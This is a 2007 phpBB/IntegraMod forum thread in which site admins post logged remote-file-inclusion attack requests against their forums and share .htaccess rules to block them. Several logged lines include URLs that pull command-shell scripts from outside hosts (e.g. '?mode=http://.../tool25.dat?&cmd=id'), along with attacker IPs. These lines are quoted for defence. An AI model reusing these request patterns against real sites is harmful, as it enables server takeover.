Sub Menu
Links Menu
Online Users

In total there are 345 users online :: 1 registered, 0 hidden and 344 guests

Most users ever online was 1091 on Wed Aug 16, 2023 5:27 pm

Registered users: Google [Bot] based on users active over the past 60 minutes

Security Logs with Hacker IP's

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Sat May 05, 2007 7:48 am

01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Anytime I tried to add one of those address's to agent blocker it would break the site. CrackTracker would throw a bunch of code line at the top of the page.
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu May 10, 2007 4:30 pm

Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Tue Jul 03, 2007 9:10 pm

Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets tru but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Fri Jul 13, 2007 12:03 pm

Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
[hr:1wyttcgu]
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
Last edited by jomasaco on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

jomasaco
Members
Members
 
Posts: 31
Likes: 0 post
Liked in: 0 post
Joined: Wed Jun 20, 2007 1:16 am
Cash on hand: 0.00

PostAuthor: viragotech » Fri Jul 13, 2007 11:20 pm

I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it a whole new block of domains. But thank god none of them have work as they get caught and dumpped as 403 errors.

Once I noticed I did spend the first few days reporting sites getting them shut down but once I realized they change domains daily it doesn't make any sense andits mucho work.

Though I have been editing mt htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.
Last edited by viragotech on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
User avatar
viragotech
Sr Integra Member
Sr Integra Member
 
Posts: 292
Likes: 0 post
Liked in: 0 post
Joined: Wed Jul 04, 2007 10:30 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Sun Jul 15, 2007 9:53 am

Though I have been editing my htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.


I'm using the ip's not the url's, i know the ip's are proxies but I figure I've a better chance to block. (although that .script didn't work the prox did... so if i block the prox I may well stop a run with a .script that does work.)

As soon as i get a attempt I add the ip to the htaccess, this creates a update to my proxy ban list. Also I have started adding " # date " (rem statements) once the prox is dead it could be removed from the list and help keep the htaccess file size down as I think the file gets processed on every hit.
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Sun Jul 15, 2007 3:52 pm

one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm
Last edited by jomasaco on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

jomasaco
Members
Members
 
Posts: 31
Likes: 0 post
Liked in: 0 post
Joined: Wed Jun 20, 2007 1:16 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Whisky » Fri Jul 20, 2007 6:45 am

I've got serious attacks (hopefully blocked) several times a day on my portal!


[color=red]62.60.137.49
Fri 20 Jul 2007, 5]


This proove that people complaining here about the insecurity of IM or the innutility of CrackerTracker are just idiots in my opinion <img>
Last edited by Whisky on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
I am the Lizard King, I can do anything

Whisky
Sr Integra Member
Sr Integra Member
 
Posts: 256
Likes: 0 post
Liked in: 0 post
Joined: Thu May 18, 2006 1:28 am
Cash on hand: 0.00
Location: Brussels

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Fri Jul 20, 2007 12:04 pm

yea my logs look like that too, for all the trouble setting up CT I got to say it was worth it. <img>
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Mon Jul 23, 2007 4:08 pm

still was not for this but should be barely... :P :P <img>

This brutes do not have life, do not eat, do not drink, do not sleep, I have there xxx but I find that also do not want.
Last edited by jomasaco on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

jomasaco
Members
Members
 
Posts: 31
Likes: 0 post
Liked in: 0 post
Joined: Wed Jun 20, 2007 1:16 am
Cash on hand: 0.00

PostAuthor: viragotech » Wed Jul 25, 2007 12:21 pm

yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host from so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He dunno how they got root access but all is gone.
Last edited by viragotech on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
User avatar
viragotech
Sr Integra Member
Sr Integra Member
 
Posts: 292
Likes: 0 post
Liked in: 0 post
Joined: Wed Jul 04, 2007 10:30 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Wed Jul 25, 2007 7:18 pm

Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]


So you need it to look like this in the htaccess file.

Code: Select all
 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  


If the rewriteengine is already on just add the first line in the quote if not add the whole code to the file so it will process it.
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

Re: Security Logs with Hacker IP's

PostAuthor: Whisky » Thu Jul 26, 2007 4:25 am

Code: Select all
 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  



Definitly interresting, thank you <img>
Last edited by Whisky on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
I am the Lizard King, I can do anything

Whisky
Sr Integra Member
Sr Integra Member
 
Posts: 256
Likes: 0 post
Liked in: 0 post
Joined: Thu May 18, 2006 1:28 am
Cash on hand: 0.00
Location: Brussels

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Fri Jul 27, 2007 8:16 pm

NP whisky, day 4 since i added that myself. On a side note it's been nice and quiet. <img>
Last edited by CaNNon on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 11:15 am
Cash on hand: 0.00

PostAuthor: Pflegen » Fri Aug 17, 2007 12:47 pm

When my IM site got hit a while back, I ended up blocking URL's with "/includes" or "/function*" in them.

Note: I also turned off allow_fopen_url in the php.ini

.htaccess or httpd.conf
===============

<Files>
Order allow,deny
Deny from all
</Files>

<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL Rewrite as well though. May consider that as a follow-up to catch the others that arent using the include or function* paths.
Last edited by Pflegen on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

Pflegen
Newbie
Newbie
 
Posts: 3
Likes: 0 post
Liked in: 0 post
Joined: Fri Aug 17, 2007 11:46 am
Cash on hand: 0.00

Next

Return to Forum Security

Who is online

Registered users: Google [Bot]

cron